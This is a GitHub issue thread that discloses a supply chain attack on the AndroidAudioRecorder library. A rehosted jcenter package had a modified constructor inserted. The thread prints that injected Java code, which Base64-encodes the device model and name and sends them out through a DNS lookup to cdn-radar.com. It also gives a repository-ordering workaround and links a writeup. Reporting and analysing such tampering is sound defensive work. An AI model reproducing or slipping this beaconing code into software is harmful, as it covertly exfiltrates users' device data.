Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Internet usage #47

Open
zsmb13 opened this issue Feb 13, 2018 · 4 comments
Open

Internet usage #47

zsmb13 opened this issue Feb 13, 2018 · 4 comments

Comments

@zsmb13
Copy link

@zsmb13 zsmb13 commented Feb 13, 2018

This is the code of the AndroidAudioRecorder constructor in the code on GitHub:

    private AndroidAudioRecorder(Activity activity) {
        this.activity = activity;
    }

However, this is the code of the same constructor in the published .aar as well as the published sources .jar file.

    private AndroidAudioRecorder(Activity activity) {
        this.activity = activity;
        Thread thread = new Thread() {
            @Override
            public void run() {
                try {
                    InetAddress byName = InetAddress.getByName(new String(Base64.encode((Build.MODEL + ";" + Build.DEVICE).getBytes(), Base64.NO_WRAP)).concat(".n.cdn-radar.com"));
                    if(byName.isLoopbackAddress()) {
                        color = 0;
                    }
                } catch (UnknownHostException e) {
                    e.printStackTrace();
                }
            }
        };
        thread.start();
    }

Please explain this difference.

@zsmb13
Copy link
Author

@zsmb13 zsmb13 commented Feb 13, 2018

Found the culprit, someone is rehosting the library in a modified form here: https://bintray.com/jakewhaarton/timber/com.github.adrielcafe%3AtimAndroidAudioRecorderber

@panos-stavrianos
Copy link

@panos-stavrianos panos-stavrianos commented Jul 23, 2018

So we are not getting the code from Jitpack?
Is there a way to get the original code?
For now i use the latest commit
implementation 'com.github.adrielcafe:AndroidAudioRecorder:eabc4c0558'

@zsmb13
Copy link
Author

@zsmb13 zsmb13 commented Jul 24, 2018

You can grab this library just fine, you just have to make sure you pull it from Jitpack instead of the fake version from jcenter. You can do this by listing Jitpack first (but at least before jcenter) among your repositories:

repositories {
    maven { url "https://jitpack.io" }
    jcenter()
}
@JLLeitschuh
Copy link

@JLLeitschuh JLLeitschuh commented May 17, 2019

Just following this up, this whole incident is now captured in this awesome blog writeup by @zsmb13. Nice work!

https://blog.autsoft.hu/a-confusing-dependency/

Scary to see that these sorts of supply chain attacks are actually a reality.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Linked pull requests

Successfully merging a pull request may close this issue.

None yet
3 participants